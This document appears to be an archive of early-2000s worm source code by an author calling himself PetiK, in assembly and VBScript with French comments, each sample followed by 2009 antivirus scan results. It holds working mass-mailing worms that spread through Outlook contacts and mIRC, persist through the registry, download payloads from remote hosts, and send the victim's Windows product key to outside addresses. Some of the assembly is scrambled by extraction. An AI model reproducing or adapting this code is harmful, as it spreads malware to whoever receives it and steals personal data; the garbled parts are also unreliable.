vbsd: db 'DEBUT()',0dh,0ah db 'Sub DEBUT()',0dh,0ah db 'EMAIL()',0dh,0ah db 'End Sub',0dh,0ah db '',0dh,0ah db 'Sub EMAIL()',0dh,0ah db 'Set K = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'Set N = K.CreateItem(0)',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah

db 'Set P = M.AddressEntries(O)',0dh,0ah db 'If O = 1 Then',0dh,0ah db 'N.BCC = P.Address',0dh,0ah db 'Else',0dh,0ah db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah db 'N.Send',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End Sub',0dh,0ah vbstaille equ $-vbsd batd: db '@echo off',0dh,0ah db 'start C:\Win32\ENVOIE.VBS',0dh,0ah battaille equ $-batd inid: db "[script]",0dh,0ah db "n0=on 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah db "n3=}",00h initaille equ $-inid include icone.inc .code DEBUT: VERIF:

mov call cmp jne push call push push push call push push call push push call push push push call push push call push push call push push push call

eax,offset CLE REG [regDisp],1 INIFILE 0 GetModuleHandleA 260 offset szOrig eax GetModuleFileNameA 260 offset szCopie GetSystemDirectoryA offset Copie offset szCopie lstrcat 00h offset szCopie offset szOrig CopyFileA 260 offset szCopi2 GetWindowsDirectoryA offset Copie2 offset szCopi2 lstrcat 00h offset szCopi2 offset szOrig CopyFileA 260 offset szWin GetWindowsDirectoryA offset Winini offset szWin lstrcat offset szWin offset szCopie offset run offset windows WritePrivateProfileStringA

; Vérifie si il existe une clé ; [Atchoum] dans HKLM\Software. ; Si elle n'y est pas, ; on installe les composants ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

COPIE:

Copie le fichier original dans le dossier SYSTEM sous le nom de Wininet32.exe

puis … nouveau dans le dossier WINDOWS sous le nom de MadCow.exe

WIN_INI:push push call push push call push push push push call

Pour lancer le programme, on peut utiliser la base de registre ou le fichier WIN.INI dans le dossier WINDOWS. La démarche est simple : [windows] run="nom du programme"

DIR: EMAIL

EXEC

push push call :push push push push push push push call mov push push push push push call push call :push push push push push push push call mov push push push push push call push call jmp push push push push push push push push push call push call ret

00h offset Dossier CreateDirectoryA 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset VBSFILE CreateFileA [fh],eax 00h offset octets vbstaille offset vbsd [fh] WriteFile [fh] CloseHandle 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset BATFILE CreateFileA [fh],eax 00h offset octets battaille offset batd [fh] WriteFile [fh] CloseHandle EXECBAT offset regDisp offset regResu 0 0F003Fh 0 0 0 eax 80000002h RegCreateKeyExA [regResu] RegCloseKey 00000000h 00000001h 00000002h 00000000h 00000001h 40000000h offset fileini CreateFileA [fh],eax 00h offset octets initaille offset inid [fh] WriteFile [fh] CloseHandle 00h offset script1 offset fileini CopyFileA eax,eax COPYWIN 00h

; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

On crée ici C:\Win32 On va créer C:\Win32\ENVOIE.VBS

et C:\Win32\ENVOIE.BAT qui va éxécuter ENVOIE.VBS

REG:

; ; ; ; ; ; ; ; Software\[Atchoum] ; HKEY_LOCAL_MACHINE ; ; met la valeur dans regResu ; ; ; On va créer dans C:\Win32 ; ; le fichier script.ini ; ; en lecture seul. ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; On va copier ce fichier dans les répertoire suivant : C:\mirc C:\mirc32 C:\program files\mirc et dans C:\program files\mirc32

INIFILE:push push push push push push push call mov push push push push push call push call push push push call test jnz push

push push call test jnz push push push call test jnz push push push call test jz COPYWIN:push call push push push call push push push call jmp ICOFILE:push push push push push push push call mov push push push push push call push call push push call push push call push push call REG2: push push push push push push push push push call push push push push push push call push call jmp

offset script2 offset fileini CopyFileA eax,eax COPYWIN 00h offset script3 offset fileini CopyFileA eax,eax COPYWIN 00h offset script4 offset fileini CopyFileA eax,eax ICOFILE 0 GetModuleHandleA 260 offset szOrig2 eax GetModuleFileNameA 00h offset Copie3 offset szOrig2 CopyFileA FIN 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset fichier CreateFileA [fh],eax 00h offset octets icotaille offset icod [fh] WriteFile [fh] CloseHandle 260 offset szCico GetSystemDirectoryA offset Copico offset szCico lstrcat offset szCico offset fichier MoveFileA offset l offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE2 80000000h RegCreateKeyExA 05h offset szCico 01h 0 00h p RegSetValueExA 0 RegCloseKey FIN

; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

Si il arrive … se copier dans un de ces fichier, il va créer une copie du programme dans C:\Win32 le nom MadCow.exe

; ; ; ; ; ; Copie le fichier original ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; On va créer … la base du disque dur le fichier Salut.ico

On déplace le fichier Salut.ico dans le dossier SYSTEM sous MSLS.ICO

=> c'est fait

Run HKEY_CLASSES_ROOT %system%\MSLS.ico VALEUR PAR DEFAUT CREE UN REGISTRE FERME LA BASE DE REGISTRE PUIS TERMINE LE PROGRAMME

EXECBAT:push 01h push offset BATFILE call WinExec FIN: push 00h call ExitProcess end DEBUT

; On éxécute le fichier ENVOIE.BAT ; ; ; FIN DU PROGRAMME ;

File MadCow.exe received Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

on 05.16.2009 17:51:57 (CET) Version Last Update 4.0.0.101 2009.05.16 5.0.0.2 2009.05.16 7.9.0.168 2009.05.15 2.0.3.1 2009.05.15 5.1.2.4 2009.05.16 4.8.1335.0 2009.05.15 8.5.0.336 2009.05.15 7.2 2009.05.16 10.00 2009.05.15 0.94.1 2009.05.16 1157 2009.05.08 5.0.0.12182 2009.05.16 7.0.17.0 2009.05.14 31.6.6508 2009.05.16 4.4.4.56 2009.05.16 8.0.14470.0 2009.05.15 3.117.0.0 2009.05.16 19 2009.05.16 T3.1.1.49.0 2009.05.16 7.10.737 2009.05.16 7.0.0.125 2009.05.16 5616 2009.05.15 5616 2009.05.15 6.7.6 2009.05.15 1.4602 2009.05.16 4080 2009.05.15 6.01.05 2009.05.16 2009.1.8.0 2009.05.16 10.0.0.14 2009.05.16 4.4.2.0 2009.05.16 3.0 2009.05.16 21.29.52.00 2009.05.16 4.41.0 2009.05.16 3.2.1858.2 2009.05.16 1.4.4.12 2009.05.16 6.3.4.1.326 2009.05.15 8.950.0.1092 2009.05.15 3.12.10.5 2009.05.16 2009.5.15.1737 2009.05.15 4.6.5.0 2009.05.16

Result Email-Worm.Win32.Petik!IK Win32/PetTick.worm.8192 Worm/Petik Worm/Win32.Win32 W32/Petik.E IRC:Generic-008 I-Worm/Petik Generic.Malware.IM.5B177226 W32.Petik.A Worm.Madcow Worm.Win32.Petik.Z Win32.Petik.8192 Win32/Petik.8192.B/C W32/Petik.E Email-Worm.Win32.Petik W32/Petik.E@mm Generic.Malware.IM.5B177226 Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik Worm:Win32/Petick@mm Win32/Petik.Z W32/Pet_Tick.8192.D W32/Petik.A VBS.LoveLetter Worm.Mail.Petik.x W32/Petik-A Email-Worm.Win32.Petik W95.Pet_Tick.gen W32/PetTick@MM WORM_PETIK.E Win32.Worm.Petik.8192 VBS.LoveLetter

Additional information File size: 8192 bytes MD5...: 15b037d0d23a915fb0a78961cdc7299a SHA1..: 85864e397e3fee261bdcb62b477a71e936db39f6

;Par M.Xxxxxxx XXXXXXX (c)2000 ;TAILLE : 1034 OCTETS ;DWARF4 MODIFIE LA DATE AU 26 DECEMBRE 1999 ;C:\DWARF.VBS QUI AJOUTE UN CLE DANS LA BASE DE REGISTRE ;C:\WINDOWS\DWARF.BAT QUI AFFICHE UN MESSAGE A CHAQUE DEMARRAGE .model small .code org 100h

DATE:

HEURE:

FILE1:

FILE2:

MESSAGE:

FIN: NOM1 NOM2 prog1

mov ah,2Bh mov dh,12 mov dl,26 mov cx,1999 int 21h mov ah,2Dh xor cx,cx xor dx,dx int 21h mov ah,3Ch xor cx,cx mov dx,offset int 21h xchg ax,bx mov ah,40h mov cx,progl1 mov dx,offset int 21h mov ah,3Eh int 21h mov ah,3Ch xor cx,cx mov dx,offset int 21h xchg ax,bx mov ah,40h mov cx,progl2 mov dx,offset int 21h mov ah,3Eh int 21h mov ax,3 int 10h mov ah,9 lea dx,msg int 21h mov ah,4Ch int 21h

;26 DECEMBRE 1999

;MINUIT NOM1 ;création du 1er fichier

prog1 ;écriture ;fermeture NOM2 ;création du 2nd fichier

prog2 ;‚criture ;fermeture

progl1 prog2

db 'c:\dwarf.vbs',0 db 'c:\WINDOWS\Panda.bat',0 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah db 'msgbox "BONNO JOURNEE ?"',0Dh,0Ah db 'Dim W',0Dh,0Ah db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\dwarf.bat"' equ $-prog1 db '@echo off',0Dh,0Ah db 'if exist c:\dwarf.vbs del c:\dwarf.vbs',0Dh,0Ah db 'cls',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo UNE BOMBE A ETE PLACE DANS TON ORDINATEUR',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo DANS 5 SECONDES TU VAS MOURIR',0Dh,0Ah db 'echo.',0Dh,0Ah db 'choice /c:Q /t:Q,5 /n Le compte à rebours a commencé',0Dh,0Ah db 'if errorlevel 1 goto Die',0Dh,0Ah db ':Die',0Dh,0Ah db 'cls',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo.',0Dh,0Ah

db 'echo *** *** *** * *',0Dh,0Ah db 'echo * * * * * * ** **',0Dh,0Ah db 'echo * * * * * * * * *',0Dh,0Ah db 'echo * * * * * * * *',0Dh,0Ah db 'echo * * * * * * * *',0Dh,0Ah db 'echo * * * * * * * *',0Dh,0Ah db 'echo *** *** *** * *',0Dh,0Ah progl2 equ $-prog2 CORBEILLE db 'C:\RECYCLED\*.*',0 msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh db 'IL SE NOMME C:\dwarf.vbs',10,10,13 db 'OUVRE LE VITE $' end DATE

' ' ' ' ' ' ' '

Name : VBS.Judge.A Author : PetiK Language : VBS Date : 08/12/2000 Copy itself to %windir%\WinGDI.EXE.vbs and C:\Judge.TXT.vbs Add to HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\ WinGDI = %windir%\WinGDI.EXE.vbs Function EMAIL : Scan Address Contact and send a mail with copy.

'VBS.Judge.A par Petik (c)2000 Dim Set Set Set vbs fso,ws,file fso = CreateObject("Scripting.FileSystemObject") ws = CreateObject("WScript.Shell") file = fso.OpenTextFile(WScript.ScriptFullname,1) = file.ReadAll

DEBUT() Sub DEBUT() Set win = fso.GetSpecialFolder(0) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(win&"\WinGDI.EXE.vbs") c.Copy("C:\Judge.TXT.vbs") ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\WinGDI",win&"\WinGDI.EXE.vbs" EMAIL() 'FTP() 'AUTOEXEC() TXT() End Sub Sub EMAIL() If Not fso.FileExists("C:\Judge.txt") Then Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "BatMan, SpiderMan et les autres" msg.Body = "La vraie histoire de ces justiciers" msg.Attachments.Add "C:\Judge.TXT.vbs" msg.DeleteAfterSubmit = True If msg.To <> "" Then msg.Send End If Next End If Next end if End If End Sub Sub FTP() If Not fso.FileExists("C:\Judge.txt") Then Set bat = fso.CreateTextFile(win&"\FTP.bat") bat.WriteLine "@echo off" bat.WriteLine "start ftp -i -v -s:C:\FTP.drv" bat.close Set drv = fso.CreateTextFile("C:\FTP.drv") drv.WriteLine "open" drv.WriteLine "members.aol.com" drv.WriteLine "pentasm99" drv.WriteLine "binary" drv.WriteLine "lcd C:\" drv.WriteLine "get virus.exe" drv.WriteLine "bye" drv.WriteLine "exit" drv.close ws.Run (win&"\FTP.bat") End If End Sub Sub AUTOEXEC()

If Day(Now) = 1 then Set FileObj = CreateObject("Scripting.FileSystemObject") file = "c:\autoexec.bat" Set InStream= FileObj.OpenTextFile (file, 1, False, False) TLine = Instream.Readall Set autobat= FileObj.CreateTextFile (file, True, False) autobat.write(tline) autobat.WriteBlankLines(1) autobat.WriteLine "@echo off" autobat.WriteLine "cls" autobat.WriteLine "echo." autobat.WriteLine "echo." autobat.WriteLine "echo VBS.Judge.A par PetiK (c)2000" autobat.WriteLine "echo." autobat.WriteLine "echo TON ORDINATEUR VIENT DE MOURIR" autobat.WriteLine "pause" End If End Sub Sub TXT() Set ptk = fso.CreateTextFile("C:\Judge.txt") ptk.WriteLine "Si vous lisez ce texte," ptk.WriteLine "c'est que Microsoft a encors fait des siennes" ptk.Close Set mp3 = fso.OpenTextFile("C:\Salut.mp3",2,true) mp3.Write vbs mp3.close End Sub

File Judge.TXT.vbs received on 05.16.2009 17:42:50 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.16 VBS/Anjulie AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.03 Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen AVG 8.5.0.336 2009.05.15 VBS/VBSWG BitDefender 7.2 2009.05.16 Generic.ScriptWorm.A9DC8F67 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.16 Worm.VBS-14 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 VBS.Petik eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 VBS/Judge.A GData 19 2009.05.16 Generic.ScriptWorm.A9DC8F67 Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik K7AntiVirus 7.10.737 2009.05.16 Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 VBS/Generic McAfee+Artemis 5616 2009.05.15 VBS/Generic McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.03 Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.I NOD32 4080 2009.05.15 VBS/Petik.A Norman 6.01.05 2009.05.16 VBS/GenMail.D nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A@mm Panda 10.0.0.14 2009.05.16 VBS/I-Worm PCTools 4.4.2.0 2009.05.16 VBS.Petik.I Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Worm.Hopalong Sophos 4.41.0 2009.05.16 VBS/Judge Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.B@mm TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBS_JUDGE.A VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.I Additional information File size: 2587 bytes MD5...: 538a05a6e0dd048eae2c3b06338bd5d7 SHA1..: fef767df96e3dbeb009d6cd746bee12c33fb3257

' ' ' '

Name : VBS.Noel Author : PetiK Language : VBS Date : 12/12/2000

Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") DEBUT() Sub DEBUT() Set win = fso.GetSpecialFolder(0) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy("C:\NOEL.GIF.vbs") EMAIL() End Sub Sub EMAIL() Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "JOUYEUX NOEL" msg.Body = "Voici une photodu PERE NOEL" msg.Attachments.Add ("C:\NOEL.GIF.vbs") If msg.To <> "" Then msg.Send End If Next End If Next End if Set msg2 = OApp.CreateItem(0) msg2.BCC = "Panda34@caramail.com; Pif878@aol.com" nom = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\RegisteredOwner") CN = CreateObject("WScript.NetWork").ComputerName msg2.Subject = "Message de """ & nom & """ alias " & CN & "" page = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") PK = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\ProductKey") msg2.Body = "-IE : """ & page & """ -Produkt Key """ & PK & """" msg2.Send End Sub

File NOEL.GIF.vbs received on 05.11.2009 07:04:27 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.166 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.327 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6497 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.729 7.0.0.125 5611 5611 6.7.6 1.4602 4063 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.00.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.324 8.950.0.1092 3.12.10.4 2009.5.11.1728 4.6.5.0 Last Update 2009.05.11 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.10 2009.05.10 2009.05.11 2009.05.09 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.08 2009.05.10 2009.05.11 2009.05.10 2009.05.11 2009.05.11 2009.05.08 2009.05.11 2009.05.10 2009.05.10 2009.05.11 2009.05.10 2009.05.08 2009.05.08 2009.05.10 2009.05.10 2009.05.07 2009.05.11 2009.05.11 2009.05.11 2009.05.09 2009.05.11 2009.05.09 2009.05.11 2009.05.11 2009.05.11 2009.05.10 Result Email-Worm.Win32.Petik!IK VBS/Petik Worm/Petik.J1 Worm/Win32.Win32 VBS/Petik.M@mm VBS:MailWorm-gen VBS/VBSWG Generic.ScriptWorm.A79766E0 VBS/Petik.M Worm.Win32.Email-Worm.Petik modification of VBS.Generic.458 VBS/Buggy VBS/Petik.M@mm Email-Worm.Win32.Petik VBS/Petik.J@mm Generic.ScriptWorm.A79766E0 Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick.vbs W32/PetTick.vbs Worm.Petik.J1 Virus:VBS/Petik.J probably unknown SCRIPT VBS/GenMail.D VBS.Petik.B@mm VBS.Petik.J Worm.Hopalong VBS/Petik-J VBS.LoveLetter.Var VBS_GENERIC.009 Email-Worm.Win32.Petik VBS.Worm-Family VBS.Petik.J

Additional information File size: 1352 bytes MD5...: fcc75e971157a8d9103b5bc583847f87 SHA1..: 2fd63f05fb1a2ee79db2d227f902f94fa12851b5

comment $ W32.TWIN par PetiK le 20/12/2000 POUR COMPILER: tasm32 /M /ML ?????.asm tlink32 -Tpe -x -aa ?????.obj,,,import32 $ .386 jumps locals .model flat, stdcall ;KERNEL32.dll extrn lstrcat:PROC extrn WritePrivateProfileStringA:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn CreateFileA:PROC extrn WriteFile:PROC extrn CloseHandle:PROC extrn ExitProcess:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetWindowsDirectoryA:PROC ;USER32.dll extrn MessageBoxA:PROC ;ADVAPI32.dll extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC .data fh octets regDisp regResu l p szBAT szCopie szOrig szHTM szVBS szWin Copie BATFILE HTMFILE VBSFILE Winini run windows CLE CLE2 NOM2 dd dd dd dd dd dd db db db db db db db db db db db db db db db db ? ? 0 0 0 0 260 dup (0) 260 dup (0) 260 dup (0) 260 dup (0) 260 dup (0) 260 dup (0) "\NAV5.exe",00h "\IE55.bat",00h "\IE55.htm",00h "\IE55.vbs",00h "\\WIN.INI",00h "run",00h "windows",00h "Software\[PetiK]",00h "\Software\Microsoft\Internet Explorer\Main",00h "Start Page",00h

vbsd: db 'rem IE55.vbs pour W32.TWiN',0dh,0ah db '',0dh,0ah db 'Dim fso,ws,file',0dh,0ah db 'Set fso = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set ws = CreateObject("WScript.Shell")',0dh,0ah db 'DEBUT()',0dh,0ah db 'Sub DEBUT()',0dh,0ah db 'Set win = fso.GetSpecialFolder(0)',0dh,0ah db 'Set sys = fso.GetSpecialFolder(1)',0dh,0ah db 'ws.Run (sys&"\IE55.htm")',0dh,0ah db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\' db 'Download Directory","C:\"',0dh,0ah db 'If fso.FileExists("C:\PlugIE55.exe") Then',0dh,0ah db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\' db 'Start Page","http://www.atoutmicro.ca/viralert.htm"',0dh,0ah

db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\' db 'PlugIE55","C:\PlugIE55.exe"',0dh,0ah db 'End If',0dh,0ah db 'MIRC()',0dh,0ah db 'End Sub',0dh,0ah db '',0dh,0ah db 'Sub MIRC()',0dh,0ah db 'On Error Resume Next',0dh,0ah db 'If fso.FileExists("C:\mirc\script.ini") Then',0dh,0ah db ' Set c = (sys&"\NAV5.exe")',0dh,0ah db ' c.Copy("C:\mirc\XPICTURE.exe")',0dh,0ah db ' Set srpt = fso.CreateTextFile("C:\mirc\script.ini",true)',0dh,0ah db ' srpt.WriteLine "[script]"',0dh,0ah db ' srpt.WriteLine "n0=on 1:JOIN:#:{"',0dh,0ah db ' srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"',0dh,0ah db ' srpt.WriteLine "n2= /.dcc send $nick C:\mirc\XPICTURE.exe"',0dh,0ah db ' srpt.WriteLine "n3=}"',0dh,0ah db ' srpt.Close',0dh,0ah db 'End If',0dh,0ah db 'End Sub',0dh,0ah vbstaille equ $-vbsd htmd: db '<HTML><HEAD>',0dh,0ah db '<TITLE>Plugin pour Internet Explorer / ' db 'Plugin for Internet Explorer</TITLE>',0dh,0ah db '<SCRIPT language="JavaScript">',0dh,0ah db 'site="http://www.multimania.com/kadosh/PlugIE55.exe ";',0dh,0ah db 'temps = 10;',0dh,0ah db '',0dh,0ah db 'function affiche()',0dh,0ah db '{ if (temps-- == 0) ',0dh,0ah db ' { clearInterval(attente);',0dh,0ah db ' location.href=site;',0dh,0ah db ' return;',0dh,0ah db ' }',0dh,0ah db ' document.forms[0].elements[0].value = temps;',0dh,0ah db '}',0dh,0ah db '</SCRIPT>',0dh,0ah db ' ',0dh,0ah db '</HEAD>',0dh,0ah db '<BODY bgColor=black text=red onload='''attente = setInterval' db '("affiche()", 1000);'''>',0dh,0ah db '<DIV align=center>',0dh,0ah db '<H1>Plugin pour Microsoft Internet Explorer</H1>',0dh,0ah db '<H1>Plugin for Microsoft Internet Explorer</H1>',0dh,0ah db '</DIV>',0dh,0ah db '<DIV align=left>',0dh,0ah db '<HR SIZE=4>',0dh,0ah db '<H3>Merci de télécharger le plugin dans le réperoire C:\</H3>',0dh,0ah db '<H3>Please download the plugin in C:\ path</H3>',0dh,0ah db '<HR SIZE=1>',0dh,0ah db '</DIV>v db '<DIV align=center>',0dh,0ah db '<FORM><BIG>Téléchargement dans <INPUT size=1 value=8> secondes</BIG>',0dh,0ah db '</FORM></DIV></BODY></HTML>',0dh,0ah htmtaille equ $-htmd batd: db '@echo off',0dh,0ah db 'start C:\WINDOWS\SYSTEM\IE55.vbs',00h battaille equ $-batd .code DEBUT: mov call cmp jne eax, offset CLE REG [regDisp],1 FIN 0 GetModuleHandleA 260 offset szOrig eax GetModuleFileNameA 260 offset szCopie GetWindowsDirectoryA ; ; ; ; Vérifie si il existe une clé [PetiK] dans HKLM\Software. Si elle n'y est pas, il se copie puis modifie le fichier WIN.INI

WCOPIE: push call push push push call push push call

; ; ; Le programme se copie dans le ; ; ; dossier WINDOWS de l'ordinateur ; ; et se nommera NAV5.exe ;

push push call push push push call WIN_INI:push push call push push call push push push push call BAT: push push call push push call push push push push push push push call mov push push push push push call push call push push call push push call push push push push push push push call mov push push push push push call push call push push call push push call push push push push

offset Copie offset szCopie lstrcat 0 offset szCopie offset szOrig CopyFileA 260 offset szWin GetWindowsDirectoryA offset Winini offset szWin lstrcat offset szWin offset szCopie offset run offset windows WritePrivateProfileStringA 260 offset szBAT GetSystemDirectoryA offset BATFILE offset szBAT lstrcat 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset szBAT CreateFileA [fh],eax 00h offset octets battaille offset batd [fh] WriteFile [fh] CloseHandle 260 offset szVBS GetSystemDirectoryA offset VBSFILE offset szVBS lstrcat 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset szVBS CreateFileA [fh],eax 00h offset octets vbstaille offset vbsd [fh] WriteFile [fh] CloseHandle 260 offset szHTM GetSystemDirectoryA offset HTMFILE offset szHTM lstrcat 00000000h 00000080h 00000002h 00000000h

; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; On va créer un fichier ; ; dans le réperoire SYSTEM ; ; qui s'appelle IE55.VBS ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; On va créer un fichier ; ; dans le réperoire SYSTEM ; ; qui s'appelle IE55.HTM ; ; ; ; ; On met dans le fichier WIN.INI une routine pour que le programme s'active à chaque démarrage. Cela évite d'utiliser la BASE DE REGISTRE trop voyante. Dans WIN.INI du dossier WINDOWS "nom du programme" run= [windows]

VBS:

HTM:

push push push call mov push push push push push call push call BDR:

00000001h 40000000h offset szHTM CreateFileA [fh],eax 00h offset octets htmtaille offset htmd [fh] WriteFile [fh] CloseHandle ; ;

; ; ; ; ; ; ; ; ; ; ; ; ;

push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE2 push 80000001h call RegCreateKeyExA push 05h push offset szVBS push 01h push 0 push offset NOM2 push p call RegSetValueExA push 0 call RegCloseKey jmp FIN push offset regDisp push offset regResu push 0 push 0F003FH push 0 push 0 push 0 push eax push 80000002h call RegCreateKeyExA push [regResu] call RegCloseKey ret push 0 call ExitProcess

; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

HKEY_CURRENT_USER On va créer une clé dans la Base de Registre pour qu'il active le fichier VBS quand on va sur internet

REG:

default security descriptor KEY_ALL_ACCESS

adresse de la sous-CLE HKEY_LOCAL_MACHINE ; ; ; ; Fin du Programme

FIN:

end DEBUT

IE55.HTM <HTML><HEAD> <TITLE>Plugin pour Internet Explorer / Plugin for Internet Explorer</TITLE> <SCRIPT language="JavaScript"> site="http://www.multimania.com/kadosh/PlugIE55.exe "; temps = 10; function affiche() { if (temps-- == 0) { clearInterval(attente); location.href=site; return; } document.forms[0].elements[0].value = temps; } </SCRIPT>

